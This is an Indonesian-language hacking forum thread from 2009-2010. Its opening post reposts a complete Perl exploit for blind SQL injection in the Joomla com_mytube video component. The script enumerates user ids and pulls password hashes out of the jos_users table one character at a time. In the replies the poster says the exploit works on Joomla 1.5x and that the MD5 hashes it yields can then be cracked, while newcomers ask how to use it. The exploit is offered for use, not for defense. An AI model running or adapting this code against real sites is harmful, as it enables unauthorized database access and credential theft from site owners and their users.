IBC chat

ShoutMix chat widget
Navigation
 Portal
 Index
 Memberlist
 Profile
 FAQ
 Search

Joomla SQL injection

View previous topic View next topic Go down

Joomla SQL injection

Post  sinax89 on Wed Oct 14, 2009 11:08 pm

#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo Sad\n";}

else

{print " [-] Vulnerable Smile\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++)

{

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);

for ($x=1;$x<=32;$x++)
{

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
if ($content =~ /$regexp/)
{

for ($c=97;$c<=102;$c++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}

print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo Sad\n";}



#sumber : milw0rm.com [2009-09-21]

sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 27
Location : Bekasi

View user profile http://ibc-forum.forumc.biz

Back to top Go down

Pertamaxxx

Post  elldhi on Thu Oct 15, 2009 12:34 am

itu Joomlana bisa kita inject untuk versi joomla berapa sampe berapa???

elldhi

Posts : 4
Join date : 2009-10-15

View user profile

Back to top Go down

Re: Joomla SQL injection

Post  sinax89 on Thu Oct 15, 2009 6:42 am

elldhi wrote:itu Joomlana bisa kita inject untuk versi joomla berapa sampe berapa???


itu joomla buat versi Joomla 1.5x di Coba ya... bom bom Twisted Evil

biasanya kalau sudah berhasil kita dapet pasword MD5 tinggl di crack deh....

slamat mencoba ... Twisted Evil

sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 27
Location : Bekasi

View user profile http://ibc-forum.forumc.biz

Back to top Go down

Re: Joomla SQL injection

Post  g34rboxxx on Wed Oct 21, 2009 9:47 am

Kayaknya kenal dech ini source code ......???? hehehehhe... Basketball

g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 40
Location : Tebak hayooo

View user profile

Back to top Go down

Re: Joomla SQL injection

Post  sinax89 on Wed Oct 21, 2009 1:24 pm

g34rboxxx wrote:Kayaknya kenal dech ini source code ......???? hehehehhe... Basketball

hahaha..... tuh kan dari Milworm.... gmn c ??? affraid Twisted Evil

sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 27
Location : Bekasi

View user profile http://ibc-forum.forumc.biz

Back to top Go down

Re: Joomla SQL injection

Post  g34rboxxx on Thu Oct 22, 2009 4:15 pm

Tuchkan bener nyomotnya disitu........hihihihi............. lol! lol! lol!

g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 40
Location : Tebak hayooo

View user profile

Back to top Go down

Re: Joomla SQL injection

Post  sinax89 on Thu Jan 14, 2010 9:55 am

g34rboxxx wrote:Tuchkan bener nyomotnya disitu........hihihihi............. lol! lol! lol!

namanya masih newbie jadi masih memanfaatakan exploit orang... hehehe Basketball Basketball

sinax89
Admin

Posts : 72
Join date : 2009-10-13
Age : 27
Location : Bekasi

View user profile http://ibc-forum.forumc.biz

Back to top Go down

Re: Joomla SQL injection

Post  sanov on Sat Mar 27, 2010 7:16 am

maksudnya apa nih??? gak ngerti... mohon bimbingannya dund.... om sinax89(ceritanya gak tau nama aslinya) bimbinglah akuw

sanov

Posts : 1
Join date : 2010-03-27

View user profile

Back to top Go down

Re: Joomla SQL injection

Post  g34rboxxx on Fri Jun 04, 2010 9:36 am


maksudnya apa nih??? gak ngerti... mohon bimbingannya dund.... om sinax89(ceritanya gak tau nama aslinya) bimbinglah akuw
Berhubung bung sinaxxnya belum pulang dari laut .....jadi mohon bersabar .... affraid affraid affraid affraid ..........

g34rboxxx
Admin

Posts : 250
Join date : 2009-10-19
Age : 40
Location : Tebak hayooo

View user profile

Back to top Go down

ASK

Post  Papyrus2 on Mon Nov 29, 2010 2:24 pm

Itu cara ngegunaiinnya gmana kk??
hehe..
saya masih newbie mohon bimbingannya..
^^ Embarassed

Papyrus2

Posts : 13
Join date : 2010-11-29
Location : Dihatimu

View user profile http://www.f-crown.blogspot.com

Back to top Go down

Re: Joomla SQL injection

Post  Sponsored content Today at 11:17 pm


Sponsored content


Back to top Go down

View previous topic View next topic Back to top

- Similar topics

 
Permissions in this forum:
You cannot reply to topics in this forum